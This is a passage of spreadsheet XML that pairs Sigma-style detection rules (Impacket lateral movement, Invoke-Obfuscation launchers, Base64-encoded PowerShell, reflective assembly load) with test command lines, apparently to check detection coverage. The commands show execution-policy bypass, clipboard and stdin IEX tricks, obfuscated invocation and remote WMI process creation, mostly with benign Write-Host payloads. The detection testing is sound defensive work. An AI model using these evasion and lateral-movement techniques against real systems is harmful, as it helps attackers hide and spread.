          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C8" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D8" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E8" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"WindowStyle" Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="43" t="n"/>
      <c r="J8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K8" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B9" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C9" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D9" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E9" s="44" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="43" t="n"/>
      <c r="J9" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K9" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B10" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C10" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D10" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E10" s="44" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="43" t="n"/>
      <c r="J10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K10" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B11" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C11" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D11" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E11" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROFIle -"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="43" t="n"/>
      <c r="J11" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K11" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="43" t="n"/>
      <c r="B12" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C12" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D12" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E12" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H12" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I12" s="44" t="n"/>
      <c r="J12" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K12" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="22.5" customHeight="1" s="42">
      <c r="A13" s="43" t="n"/>
      <c r="B13" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C13" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D13" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E13" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H13" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I13" s="43" t="n"/>
      <c r="J13" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K13" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="14" ht="22.5" customHeight="1" s="42">
      <c r="A14" s="43" t="n"/>
      <c r="B14" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C14" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D14" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E14" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H14" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I14" s="43" t="n"/>
      <c r="J14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K14" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="15" ht="22.5" customHeight="1" s="42">
      <c r="A15" s="43" t="n"/>
      <c r="B15" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C15" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D15" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E15" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I15" s="44" t="n"/>
      <c r="J15" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K15" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="22.5" customHeight="1" s="42">
      <c r="A16" s="43" t="n"/>
      <c r="B16" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C16" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D16" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E16" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="43" t="n"/>
      <c r="J16" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K16" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" ht="22.5" customHeight="1" s="42">
      <c r="A17" s="43" t="n"/>
      <c r="B17" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C17" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D17" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E17" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H17" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I17" s="43" t="n"/>
      <c r="J17" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K17" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="22.5" customHeight="1" s="42">
      <c r="A18" s="43" t="n"/>
      <c r="B18" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C18" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D18" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E18" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I18" s="43" t="n"/>
      <c r="J18" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K18" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="22.5" customHeight="1" s="42">
      <c r="A19" s="43" t="n"/>
      <c r="B19" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C19" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D19" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E19" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I19" s="43" t="n"/>
      <c r="J19" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K19" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="20" ht="22.5" customHeight="1" s="42">
      <c r="A20" s="43" t="n"/>
      <c r="B20" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C20" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D20" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E20" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I20" s="43" t="n"/>
      <c r="J20" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K20" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" s="42">
      <c r="A21" s="43" t="n"/>
      <c r="B21" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C21" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D21" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E21" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H21" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I21" s="44" t="n"/>
      <c r="J21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K21" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" s="42">
      <c r="A22" s="43" t="n"/>
      <c r="B22" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C22" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D22" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E22" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXecUTionPoLiCY Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H22" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I22" s="43" t="n"/>
      <c r="J22" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K22" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" s="42">
      <c r="A23" s="43" t="n"/>
      <c r="B23" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C23" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D23" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E23" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCUTiOnpolIcy Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H23" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I23" s="43" t="n"/>
      <c r="J23" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K23" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" s="42">
      <c r="A24" s="43" t="n"/>
      <c r="B24" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C24" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D24" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E24" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H24" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I24" s="44" t="n"/>
      <c r="J24" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K24" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" s="42">
      <c r="A25" s="43" t="n"/>
      <c r="B25" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C25" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D25" s="44" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E25" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set PAYLOAD=Write-Host 'Benign Educational Bypass' &amp; set LAUNCH=powershell.exe -NoP -c \"{1}{0}\" -f 'st','Te' &amp; %LAUNCH%"</t>
        </is>
      </c>
      <c r="F25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="43" t="n"/>
      <c r="J25" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K25" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="43" t="n"/>
      <c r="B26" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_var</t>
        </is>
      </c>
      <c r="C26" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION</t>
        </is>
      </c>
      <c r="D26" s="44" t="inlineStr">
        <is>
          <t>e9f55347-2928-4c06-88e5-1a7f8169942e</t>
        </is>
      </c>
      <c r="E26" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set VAR=Invoke-Expression 'Write-Host Safe' &amp;&amp;set RUN=powershell.exe -c ('Te'+'st') &amp;&amp; %RUN%"</t>
        </is>
      </c>
      <c r="F26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="44" t="n"/>
      <c r="J26" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K26" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="43" t="n"/>
      <c r="B27" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C27" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D27" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E27" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="43" t="n"/>
      <c r="J27" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="43" t="n"/>
      <c r="B28" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C28" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D28" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E28" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXEcutIonpoliCY Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="43" t="n"/>
      <c r="J28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="43" t="n"/>
      <c r="B29" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C29" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D29" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E29" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"e" aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="43" t="n"/>
      <c r="J29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="43" t="n"/>
      <c r="B30" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C30" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D30" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E30" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H30" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="43" t="n"/>
      <c r="J30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="43" t="n"/>
      <c r="B31" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C31" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D31" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E31" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"e" SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="43" t="n"/>
      <c r="J31" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K31" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="43" t="n"/>
      <c r="B32" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C32" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D32" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E32" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="43" t="n"/>
      <c r="J32" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="43" t="n"/>
      <c r="B33" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C33" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D33" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E33" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EnCODEdCoMManD WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H33" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="43" t="n"/>
      <c r="J33" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K33" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="n"/>
      <c r="B34" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C34" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D34" s="44" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E34" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AGAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AC4ATABvAGEAZAAo</t>
        </is>
      </c>
      <c r="F34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="44" t="n">
        <v>0</v>
